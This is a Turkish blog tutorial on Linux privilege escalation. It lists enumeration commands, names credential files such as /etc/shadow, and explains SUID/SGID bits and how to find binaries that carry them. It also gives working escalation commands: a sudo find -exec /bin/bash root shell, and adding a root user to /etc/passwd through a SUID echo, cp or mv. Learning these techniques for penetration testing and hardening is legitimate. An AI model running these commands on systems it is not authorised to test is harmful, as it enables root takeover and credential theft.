Hak Yükseltme Aşaması 2

Bu yazımda linux da hak yükseltme aşamasını daha detaylı anlatacağım. Öncelikle hak yükseltme aşamasında bilgi toplama komutlarına bakalım.

Sistem versiyon bilgileri için;

  1. cat /etc/issue
  2. cat /etc/*-release
  3. cat /etc/redhat-release #redhat için

Kernel versiyon bilgileri için;

  1. uname -a
  2. cat /proc/version
  3. uname -mrs
  4. rpm -q kernel
  5. dmesg | grep Linux

Yüklü uygulamaların listesi için;

  1. ls -alh /usr/bin/
  2. ls -alh /sbin/
  3. dpkg -l

Açık portlar ve servisler için:

  1. lsof -i
  2. grep 80 /etc/services
  3. netstat -antup
  4. netstat -antpx
  5. netstat -tulpn

Kullanıcılar,parolalar ve grupların olduğu dosyalar;

  1. /etc/passwd
  2. /etc/group
  3. /etc/shadow

SUID Ve SGID Bitleri Nedir?

kısaca anlatmak gerekirse suid(set-user identification ) biti bir programı root haklarıyla çalıştırmamıza olanak sağlayan bittir.SGID(set-group identification) ise bir programı grubun haklarıyla çalıştırmamıza olanak sağlayan bittir. Ha birde sticky bit var.Sticky bit ise ilgili dosyayı sadece sahibinin silmesine olanak veren bittir.

suid ve sgid bitleri ayarlamak için;

suid >> chmod u+s [program]
sgid >> chmod g+s [program]

SUID Ve SGID Bitleri ayarlı programların bulunması

find / \( -perm -u+s -or -perm -g+s  \) -type f -exec ls -l {} \;
find . -perm /6000
find / -perm -u=s -type f 2>/dev/null

Hak Yükseltme Örnekleri

sudo -l komutu ile hangi programları root haklarıyla çalıştırabileceğime bakıyorum.

python3 ve find komutunu root haklarıyla şifresiz çalıştırabileceğimi görüyorum.

sudo python3 dedikten sonra basit bir python kodu ile root oluyorum.

find komutu ile ise çok basit bir parametre vererek komut çalıştırabiliriz ve hak yükseltebiliriz.

sudo find /home -exec /bin/bash \;

Şimdi gelelim suid ve sgid bitleri ayarlı programları bulmaya.

find / -user root -perm -6000 -exec ls -ld {} \;

Gördüğünüz gibi echo,mv ve cp komutlarını root haklarıyla çalıştırabiliriz. İlk balışta çok zararsız görünebilirler ama öyle değiller. Basit bir örnekle ne kadar zararlı olabileceklerini göstereyim.

openssl ile şifre oluşturuyorum ve echo komutu ile passwd dosyasınayeni kullanıcı ekleyip root oluyorum. Gördünüz değil mi tehlikeyi ?

Bundan sonrası zaten kafanızda oturmuştur. cp ve mv komutu ile yeni oluşturduğunuz passwd dosyasını /etc/ dizini altına kopyalayıp hak yükseltebilirsiniz.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Reklama Tıkla Destek Ol!